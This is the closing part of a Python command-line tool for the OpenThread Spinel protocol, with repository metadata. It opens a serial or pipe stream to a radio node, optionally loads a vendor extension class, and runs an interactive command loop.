stream_descriptor = options.pipe
if options.nodeid:
stream_descriptor += " " + str(options.nodeid)
else:
if len(remaining_args) > 0:
stream_descriptor = " ".join(remaining_args)
stream = StreamOpen(stream_type, stream_descriptor, options.verbose,
options.baudrate, options.rtscts)
try:
vendor_ext = importlib.import_module(vendor_module + '.vendor')
cls = type(vendor_ext.VendorSpinelCliCmd.__name__,
(SpinelCliCmd, vendor_ext.VendorSpinelCliCmd), {})
shell = cls(stream, nodeid=options.nodeid, vendor_module=vendor_module)
except ImportError:
shell = SpinelCliCmd(stream,
nodeid=options.nodeid,
vendor_module=vendor_module)
try:
shell.cmdloop()
except KeyboardInterrupt:
CONFIG.LOGGER.info('\nCTRL+C Pressed')
if shell.wpan_api:
shell.wpan_api.stream.close()
if __name__ == "__main__":
main()
|
openthread/pyspinel
|
spinel-cli.py
|
Python
|
apache-2.0
| 73,319
|